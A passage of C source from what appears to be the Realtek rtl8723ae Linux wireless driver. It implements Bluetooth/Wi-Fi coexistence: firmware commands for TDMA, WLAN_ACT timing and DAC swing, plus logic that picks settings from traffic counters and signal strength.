RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], turn TDMA mode OFF!!\n");
}
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], FW2AntTDMA, write 0x26 = 0x%x\n",
h2c_parameter1[0]);
rtl8723ae_fill_h2c_cmd(hw, 0x26, 1, h2c_parameter1);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], FW2AntTDMA, write 0x14 = 0x%x\n", h2c_parameter[0]);
rtl8723ae_fill_h2c_cmd(hw, 0x14, 1, h2c_parameter);
}
static void rtl8723ae_dm_bt_set_fw_ignore_wlan_act(struct ieee80211_hw *hw,
bool enable)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
u8 h2c_parameter[1] = {0};
if (enable) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], BT Ignore Wlan_Act !!\n");
h2c_parameter[0] |= BIT(0); /* function enable */
rtlpcipriv->bt_coexist.fw_coexist_all_off = false;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], BT don't ignore Wlan_Act !!\n");
}
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], set FW for BT Ignore Wlan_Act, write 0x25 = 0x%x\n",
h2c_parameter[0]);
rtl8723ae_fill_h2c_cmd(hw, 0x25, 1, h2c_parameter);
}
static void rtl8723ae_dm_bt_set_fw_tra_tdma_ctrl(struct ieee80211_hw *hw,
bool enable, u8 ant_num,
u8 nav_en)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_hal *rtlhal = rtl_hal(rtl_priv(hw));
u8 h2c_parameter[2] = {0};
/* Only 8723 B cut should do this */
if (IS_VENDOR_8723_A_CUT(rtlhal->version)) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], not 8723B cut, don't set Traditional TDMA!!\n");
return;
}
if (enable) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], turn TTDMA mode ON!!\n");
h2c_parameter[0] |= BIT(0); /* function enable */
if (TDMA_1ANT == ant_num) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], TTDMA_1ANT\n");
h2c_parameter[0] |= BIT(1);
} else if (TDMA_2ANT == ant_num) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], TTDMA_2ANT\n");
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], Unknown Ant\n");
}
if (TDMA_NAV_OFF == nav_en) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], TTDMA_NAV_OFF\n");
} else if (TDMA_NAV_ON == nav_en) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], TTDMA_NAV_ON\n");
h2c_parameter[1] |= BIT(0);
}
rtlpcipriv->bt_coexist.fw_coexist_all_off = false;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], turn TTDMA mode OFF!!\n");
}
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], FW Traditional TDMA, write 0x33 = 0x%x\n",
h2c_parameter[0] << 8 | h2c_parameter[1]);
rtl8723ae_fill_h2c_cmd(hw, 0x33, 2, h2c_parameter);
}
static void rtl8723ae_dm_bt_set_fw_dac_swing_level(struct ieee80211_hw *hw,
u8 dac_swing_lvl)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
u8 h2c_parameter[1] = {0};
h2c_parameter[0] = dac_swing_lvl;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], Set Dac Swing Level = 0x%x\n", dac_swing_lvl);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], write 0x29 = 0x%x\n", h2c_parameter[0]);
rtl8723ae_fill_h2c_cmd(hw, 0x29, 1, h2c_parameter);
}
static void rtl8723ae_dm_bt_set_fw_bt_hid_info(struct ieee80211_hw *hw,
bool enable)
{
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_priv *rtlpriv = rtl_priv(hw);
u8 h2c_parameter[1] = {0};
h2c_parameter[0] = 0;
if (enable) {
h2c_parameter[0] |= BIT(0);
rtlpcipriv->bt_coexist.fw_coexist_all_off = false;
}
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], Set BT HID information = 0x%x\n", enable);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], write 0x24 = 0x%x\n", h2c_parameter[0]);
rtl8723ae_fill_h2c_cmd(hw, 0x24, 1, h2c_parameter);
}
static void rtl8723ae_dm_bt_set_fw_bt_retry_index(struct ieee80211_hw *hw,
u8 retry_index)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
u8 h2c_parameter[1] = {0};
h2c_parameter[0] = retry_index;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], Set BT Retry Index=%d\n", retry_index);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], write 0x23 = 0x%x\n", h2c_parameter[0]);
rtl8723ae_fill_h2c_cmd(hw, 0x23, 1, h2c_parameter);
}
static void rtl8723ae_dm_bt_set_fw_wlan_act(struct ieee80211_hw *hw,
u8 wlan_act_hi, u8 wlan_act_lo)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
u8 h2c_parameter_hi[1] = {0};
u8 h2c_parameter_lo[1] = {0};
h2c_parameter_hi[0] = wlan_act_hi;
h2c_parameter_lo[0] = wlan_act_lo;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], Set WLAN_ACT Hi:Lo = 0x%x/0x%x\n", wlan_act_hi,
wlan_act_lo);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], write 0x22 = 0x%x\n", h2c_parameter_hi[0]);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], write 0x11 = 0x%x\n", h2c_parameter_lo[0]);
/* WLAN_ACT = High duration, unit:ms */
rtl8723ae_fill_h2c_cmd(hw, 0x22, 1, h2c_parameter_hi);
/* WLAN_ACT = Low duration, unit:3*625us */
rtl8723ae_fill_h2c_cmd(hw, 0x11, 1, h2c_parameter_lo);
}
void rtl8723ae_dm_bt_set_bt_dm(struct ieee80211_hw *hw, struct btdm_8723 *btdm)
{
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_hal *rtlhal = rtl_hal(rtlpriv);
struct btdm_8723 *btdm_8723 = &rtlhal->hal_coex_8723.btdm;
u8 i;
bool fw_current_inpsmode = false;
bool fw_ps_awake = true;
rtlpriv->cfg->ops->get_hw_reg(hw, HW_VAR_FW_PSMODE_STATUS,
(u8 *)(&fw_current_inpsmode));
rtlpriv->cfg->ops->get_hw_reg(hw, HW_VAR_FWLPS_RF_ON,
(u8 *)(&fw_ps_awake));
/* check new setting is different than the old one,
* if all the same, don't do the setting again.
*/
if (memcmp(btdm_8723, btdm, sizeof(struct btdm_8723)) == 0) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], the same coexist setting, return!!\n");
return;
} else { /* save the new coexist setting */
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], UPDATE TO NEW COEX SETTING!!\n");
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new bAllOff = 0x%x/ 0x%x\n",
btdm_8723->all_off, btdm->all_off);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new agc_table_en = 0x%x/ 0x%x\n",
btdm_8723->agc_table_en, btdm->agc_table_en);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new adc_back_off_on = 0x%x/ 0x%x\n",
btdm_8723->adc_back_off_on, btdm->adc_back_off_on);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new b2_ant_hid_en = 0x%x/ 0x%x\n",
btdm_8723->b2_ant_hid_en, btdm->b2_ant_hid_en);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new bLowPenaltyRateAdaptive = 0x%x/ 0x%x\n",
btdm_8723->low_penalty_rate_adaptive,
btdm->low_penalty_rate_adaptive);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new bRfRxLpfShrink = 0x%x/ 0x%x\n",
btdm_8723->rf_rx_lpf_shrink, btdm->rf_rx_lpf_shrink);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new bRejectAggrePkt = 0x%x/ 0x%x\n",
btdm_8723->reject_aggre_pkt, btdm->reject_aggre_pkt);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new tdma_on = 0x%x/ 0x%x\n",
btdm_8723->tdma_on, btdm->tdma_on);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new tdmaAnt = 0x%x/ 0x%x\n",
btdm_8723->tdma_ant, btdm->tdma_ant);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new tdmaNav = 0x%x/ 0x%x\n",
btdm_8723->tdma_nav, btdm->tdma_nav);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new tdma_dac_swing = 0x%x/ 0x%x\n",
btdm_8723->tdma_dac_swing, btdm->tdma_dac_swing);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new fwDacSwingLvl = 0x%x/ 0x%x\n",
btdm_8723->fw_dac_swing_lvl, btdm->fw_dac_swing_lvl);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new bTraTdmaOn = 0x%x/ 0x%x\n",
btdm_8723->tra_tdma_on, btdm->tra_tdma_on);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new traTdmaAnt = 0x%x/ 0x%x\n",
btdm_8723->tra_tdma_ant, btdm->tra_tdma_ant);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new traTdmaNav = 0x%x/ 0x%x\n",
btdm_8723->tra_tdma_nav, btdm->tra_tdma_nav);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new bPsTdmaOn = 0x%x/ 0x%x\n",
btdm_8723->ps_tdma_on, btdm->ps_tdma_on);
for (i = 0; i < 5; i++) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new psTdmaByte[i] = 0x%x/ 0x%x\n",
btdm_8723->ps_tdma_byte[i],
btdm->ps_tdma_byte[i]);
}
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new bIgnoreWlanAct = 0x%x/ 0x%x\n",
btdm_8723->ignore_wlan_act, btdm->ignore_wlan_act);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new bPtaOn = 0x%x/ 0x%x\n",
btdm_8723->pta_on, btdm->pta_on);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new val_0x6c0 = 0x%x/ 0x%x\n",
btdm_8723->val_0x6c0, btdm->val_0x6c0);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new val_0x6c8 = 0x%x/ 0x%x\n",
btdm_8723->val_0x6c8, btdm->val_0x6c8);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new val_0x6cc = 0x%x/ 0x%x\n",
btdm_8723->val_0x6cc, btdm->val_0x6cc);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new sw_dac_swing_on = 0x%x/ 0x%x\n",
btdm_8723->sw_dac_swing_on, btdm->sw_dac_swing_on);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new sw_dac_swing_lvl = 0x%x/ 0x%x\n",
btdm_8723->sw_dac_swing_lvl,
btdm->sw_dac_swing_lvl);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new wlanActHi = 0x%x/ 0x%x\n",
btdm_8723->wlan_act_hi, btdm->wlan_act_hi);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new wlanActLo = 0x%x/ 0x%x\n",
btdm_8723->wlan_act_lo, btdm->wlan_act_lo);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new btRetryIndex = 0x%x/ 0x%x\n",
btdm_8723->bt_retry_index, btdm->bt_retry_index);
memcpy(btdm_8723, btdm, sizeof(struct btdm_8723));
}
/*
* Here we only consider when Bt Operation
* inquiry/paging/pairing is ON
* we only need to turn off TDMA
*/
if (rtlpcipriv->bt_coexist.hold_for_bt_operation) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], set to ignore wlanAct for BT OP!!\n");
rtl8723ae_dm_bt_set_fw_ignore_wlan_act(hw, true);
return;
}
if (btdm->all_off) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], disable all coexist mechanism !!\n");
rtl8723ae_btdm_coex_all_off(hw);
return;
}
rtl8723ae_dm_bt_reject_ap_aggregated_packet(hw, btdm->reject_aggre_pkt);
if (btdm->low_penalty_rate_adaptive)
rtl8723ae_bt_set_penalty_tx_rate_adap(hw,
BT_TX_RATE_ADAPTIVE_LOW_PENALTY);
else
rtl8723ae_bt_set_penalty_tx_rate_adap(hw,
BT_TX_RATE_ADAPTIVE_NORMAL);
if (btdm->rf_rx_lpf_shrink)
rtl8723ae_dm_bt_set_sw_rf_rx_lpf_corner(hw,
BT_RF_RX_LPF_CORNER_SHRINK);
else
rtl8723ae_dm_bt_set_sw_rf_rx_lpf_corner(hw,
BT_RF_RX_LPF_CORNER_RESUME);
if (btdm->agc_table_en)
rtl8723ae_dm_bt_agc_table(hw, BT_AGCTABLE_ON);
else
rtl8723ae_dm_bt_agc_table(hw, BT_AGCTABLE_OFF);
if (btdm->adc_back_off_on)
rtl8723ae_dm_bt_bback_off_level(hw, BT_BB_BACKOFF_ON);
else
rtl8723ae_dm_bt_bback_off_level(hw, BT_BB_BACKOFF_OFF);
rtl8723ae_dm_bt_set_fw_bt_retry_index(hw, btdm->bt_retry_index);
rtl8723ae_dm_bt_set_fw_dac_swing_level(hw, btdm->fw_dac_swing_lvl);
rtl8723ae_dm_bt_set_fw_wlan_act(hw, btdm->wlan_act_hi,
btdm->wlan_act_lo);
rtl8723ae_dm_bt_set_coex_table(hw, btdm->val_0x6c0,
btdm->val_0x6c8, btdm->val_0x6cc);
rtl8723ae_dm_bt_set_hw_pta_mode(hw, btdm->pta_on);
/* Note: There is a constraint between TDMA and 2AntHID
* Only one of 2AntHid and tdma can be turned on
* We should turn off those mechanisms first
* and then turn on them on.
*/
if (btdm->b2_ant_hid_en) {
/* turn off tdma */
rtl8723ae_dm_bt_set_fw_tra_tdma_ctrl(hw, btdm->tra_tdma_on,
btdm->tra_tdma_ant,
btdm->tra_tdma_nav);
rtl8723ae_dm_bt_set_fw_tdma_ctrl(hw, false, btdm->tdma_ant,
btdm->tdma_nav,
btdm->tdma_dac_swing);
/* turn off Pstdma */
rtl8723ae_dm_bt_set_fw_ignore_wlan_act(hw,
btdm->ignore_wlan_act);
/* Antenna control by PTA, 0x870 = 0x300. */
rtl8723ae_dm_bt_set_fw_3a(hw, 0x0, 0x0, 0x0, 0x8, 0x0);
/* turn on 2AntHid */
rtl8723ae_dm_bt_set_fw_bt_hid_info(hw, true);
rtl8723ae_dm_bt_set_fw_2_ant_hid(hw, true, true);
} else if (btdm->tdma_on) {
/* turn off 2AntHid */
rtl8723ae_dm_bt_set_fw_bt_hid_info(hw, false);
rtl8723ae_dm_bt_set_fw_2_ant_hid(hw, false, false);
/* turn off pstdma */
rtl8723ae_dm_bt_set_fw_ignore_wlan_act(hw,
btdm->ignore_wlan_act);
/* Antenna control by PTA, 0x870 = 0x300. */
rtl8723ae_dm_bt_set_fw_3a(hw, 0x0, 0x0, 0x0, 0x8, 0x0);
/* turn on tdma */
rtl8723ae_dm_bt_set_fw_tra_tdma_ctrl(hw, btdm->tra_tdma_on,
btdm->tra_tdma_ant, btdm->tra_tdma_nav);
rtl8723ae_dm_bt_set_fw_tdma_ctrl(hw, true, btdm->tdma_ant,
btdm->tdma_nav, btdm->tdma_dac_swing);
} else if (btdm->ps_tdma_on) {
/* turn off 2AntHid */
rtl8723ae_dm_bt_set_fw_bt_hid_info(hw, false);
rtl8723ae_dm_bt_set_fw_2_ant_hid(hw, false, false);
/* turn off tdma */
rtl8723ae_dm_bt_set_fw_tra_tdma_ctrl(hw, btdm->tra_tdma_on,
btdm->tra_tdma_ant, btdm->tra_tdma_nav);
rtl8723ae_dm_bt_set_fw_tdma_ctrl(hw, false, btdm->tdma_ant,
btdm->tdma_nav, btdm->tdma_dac_swing);
/* turn on pstdma */
rtl8723ae_dm_bt_set_fw_ignore_wlan_act(hw,
btdm->ignore_wlan_act);
rtl8723ae_dm_bt_set_fw_3a(hw,
btdm->ps_tdma_byte[0],
btdm->ps_tdma_byte[1],
btdm->ps_tdma_byte[2],
btdm->ps_tdma_byte[3],
btdm->ps_tdma_byte[4]);
} else {
/* turn off 2AntHid */
rtl8723ae_dm_bt_set_fw_bt_hid_info(hw, false);
rtl8723ae_dm_bt_set_fw_2_ant_hid(hw, false, false);
/* turn off tdma */
rtl8723ae_dm_bt_set_fw_tra_tdma_ctrl(hw, btdm->tra_tdma_on,
btdm->tra_tdma_ant, btdm->tra_tdma_nav);
rtl8723ae_dm_bt_set_fw_tdma_ctrl(hw, false, btdm->tdma_ant,
btdm->tdma_nav, btdm->tdma_dac_swing);
/* turn off pstdma */
rtl8723ae_dm_bt_set_fw_ignore_wlan_act(hw,
btdm->ignore_wlan_act);
/* Antenna control by PTA, 0x870 = 0x300. */
rtl8723ae_dm_bt_set_fw_3a(hw, 0x0, 0x0, 0x0, 0x8, 0x0);
}
/* Note:
* We should add delay for making sure sw DacSwing can be set
* sucessfully. Because of that rtl8723ae_dm_bt_set_fw_2_ant_hid()
* and rtl8723ae_dm_bt_set_fw_tdma_ctrl()
* will overwrite the reg 0x880.
*/
mdelay(30);
rtl8723ae_dm_bt_set_sw_full_time_dac_swing(hw,
btdm->sw_dac_swing_on, btdm->sw_dac_swing_lvl);
rtl8723ae_dm_bt_set_fw_dec_bt_pwr(hw, btdm->dec_bt_pwr);
}
/*============================================================
* extern function start with BTDM_
*============================================================
*/
static u32 rtl8723ae_dm_bt_tx_rx_couter_h(struct ieee80211_hw *hw)
{
struct rtl_hal *rtlhal = rtl_hal(rtl_priv(hw));
u32 counters = 0;
counters = rtlhal->hal_coex_8723.high_priority_tx +
rtlhal->hal_coex_8723.high_priority_rx;
return counters;
}
static u32 rtl8723ae_dm_bt_tx_rx_couter_l(struct ieee80211_hw *hw)
{
struct rtl_hal *rtlhal = rtl_hal(rtl_priv(hw));
return rtlhal->hal_coex_8723.low_priority_tx +
rtlhal->hal_coex_8723.low_priority_rx;
}
static u8 rtl8723ae_dm_bt_bt_tx_rx_counter_level(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
u32 bt_tx_rx_cnt = 0;
u8 bt_tx_rx_cnt_lvl = 0;
bt_tx_rx_cnt = rtl8723ae_dm_bt_tx_rx_couter_h(hw) +
rtl8723ae_dm_bt_tx_rx_couter_l(hw);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters = %d\n", bt_tx_rx_cnt);
rtlpcipriv->bt_coexist.cstate_h &=
~(BT_COEX_STATE_BT_CNT_LEVEL_0 | BT_COEX_STATE_BT_CNT_LEVEL_1 |
BT_COEX_STATE_BT_CNT_LEVEL_2);
if (bt_tx_rx_cnt >= BT_TXRX_CNT_THRES_3) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters at level 3\n");
bt_tx_rx_cnt_lvl = BT_TXRX_CNT_LEVEL_3;
rtlpcipriv->bt_coexist.cstate_h |= BT_COEX_STATE_BT_CNT_LEVEL_3;
} else if (bt_tx_rx_cnt >= BT_TXRX_CNT_THRES_2) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters at level 2\n");
bt_tx_rx_cnt_lvl = BT_TXRX_CNT_LEVEL_2;
rtlpcipriv->bt_coexist.cstate_h |= BT_COEX_STATE_BT_CNT_LEVEL_2;
} else if (bt_tx_rx_cnt >= BT_TXRX_CNT_THRES_1) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters at level 1\n");
bt_tx_rx_cnt_lvl = BT_TXRX_CNT_LEVEL_1;
rtlpcipriv->bt_coexist.cstate_h |= BT_COEX_STATE_BT_CNT_LEVEL_1;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters at level 0\n");
bt_tx_rx_cnt_lvl = BT_TXRX_CNT_LEVEL_0;
rtlpcipriv->bt_coexist.cstate_h |= BT_COEX_STATE_BT_CNT_LEVEL_0;
}
return bt_tx_rx_cnt_lvl;
}
static void rtl8723ae_dm_bt_2_ant_hid_sco_esco(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_hal *rtlhal = rtl_hal(rtlpriv);
struct rtl_phy *rtlphy = &(rtlpriv->phy);
struct btdm_8723 btdm8723;
u8 bt_rssi_state, bt_rssi_state1;
u8 bt_tx_rx_cnt_lvl;
rtl8723ae_dm_bt_btdm_structure_reload(hw, &btdm8723);
btdm8723.rf_rx_lpf_shrink = true;
btdm8723.low_penalty_rate_adaptive = true;
btdm8723.reject_aggre_pkt = false;
bt_tx_rx_cnt_lvl = rtl8723ae_dm_bt_bt_tx_rx_counter_level(hw);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters = %d\n", bt_tx_rx_cnt_lvl);
if (rtlphy->current_chan_bw == HT_CHANNEL_WIDTH_20_40) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG, "HT40\n");
/* coex table */
btdm8723.val_0x6c0 = 0x55555555;
btdm8723.val_0x6c8 = 0xffff;
btdm8723.val_0x6cc = 0x3;
/* sw mechanism */
btdm8723.agc_table_en = false;
btdm8723.adc_back_off_on = false;
btdm8723.sw_dac_swing_on = false;
/* fw mechanism */
btdm8723.ps_tdma_on = true;
if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_2) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0x5;
btdm8723.ps_tdma_byte[2] = 0x5;
btdm8723.ps_tdma_byte[3] = 0x2;
btdm8723.ps_tdma_byte[4] = 0x80;
} else if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_1) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1200 && < 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xa;
btdm8723.ps_tdma_byte[2] = 0xa;
btdm8723.ps_tdma_byte[3] = 0x2;
btdm8723.ps_tdma_byte[4] = 0x80;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters < 1200\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xf;
btdm8723.ps_tdma_byte[2] = 0xf;
btdm8723.ps_tdma_byte[3] = 0x2;
btdm8723.ps_tdma_byte[4] = 0x80;
}
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"HT20 or Legacy\n");
bt_rssi_state = rtl8723ae_dm_bt_check_coex_rssi_state(hw, 2,
47, 0);
bt_rssi_state1 = rtl8723ae_dm_bt_check_coex_rssi_state1(hw, 2,
27, 0);
/* coex table */
btdm8723.val_0x6c0 = 0x55555555;
btdm8723.val_0x6c8 = 0xffff;
btdm8723.val_0x6cc = 0x3;
/* sw mechanism */
if ((bt_rssi_state == BT_RSSI_STATE_HIGH) ||
(bt_rssi_state == BT_RSSI_STATE_STAY_HIGH)) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi rssi high\n");
btdm8723.agc_table_en = true;
btdm8723.adc_back_off_on = true;
btdm8723.sw_dac_swing_on = false;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi rssi low\n");
btdm8723.agc_table_en = false;
btdm8723.adc_back_off_on = false;
btdm8723.sw_dac_swing_on = false;
}
/* fw mechanism */
btdm8723.ps_tdma_on = true;
if ((bt_rssi_state1 == BT_RSSI_STATE_HIGH) ||
(bt_rssi_state1 == BT_RSSI_STATE_STAY_HIGH)) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi rssi-1 high\n");
/* only rssi high we need to do this,
* when rssi low, the value will modified by fw
*/
rtl_write_byte(rtlpriv, 0x883, 0x40);
if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_2) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0x5;
btdm8723.ps_tdma_byte[2] = 0x5;
btdm8723.ps_tdma_byte[3] = 0x83;
btdm8723.ps_tdma_byte[4] = 0x80;
} else if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_1) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1200 && < 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xa;
btdm8723.ps_tdma_byte[2] = 0xa;
btdm8723.ps_tdma_byte[3] = 0x83;
btdm8723.ps_tdma_byte[4] = 0x80;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters < 1200\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xf;
btdm8723.ps_tdma_byte[2] = 0xf;
btdm8723.ps_tdma_byte[3] = 0x83;
btdm8723.ps_tdma_byte[4] = 0x80;
}
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi rssi-1 low\n");
if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_2) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0x5;
btdm8723.ps_tdma_byte[2] = 0x5;
btdm8723.ps_tdma_byte[3] = 0x2;
btdm8723.ps_tdma_byte[4] = 0x80;
} else if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_1) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1200 && < 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xa;
btdm8723.ps_tdma_byte[2] = 0xa;
btdm8723.ps_tdma_byte[3] = 0x2;
btdm8723.ps_tdma_byte[4] = 0x80;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters < 1200\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xf;
btdm8723.ps_tdma_byte[2] = 0xf;
btdm8723.ps_tdma_byte[3] = 0x2;
btdm8723.ps_tdma_byte[4] = 0x80;
}
}
}
if (rtl8723ae_dm_bt_need_to_dec_bt_pwr(hw))
btdm8723.dec_bt_pwr = true;
/* Always ignore WlanAct if bHid|bSCOBusy|bSCOeSCO */
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT btInqPageStartTime = 0x%x, btTxRxCntLvl = %d\n",
rtlhal->hal_coex_8723.bt_inq_page_start_time,
bt_tx_rx_cnt_lvl);
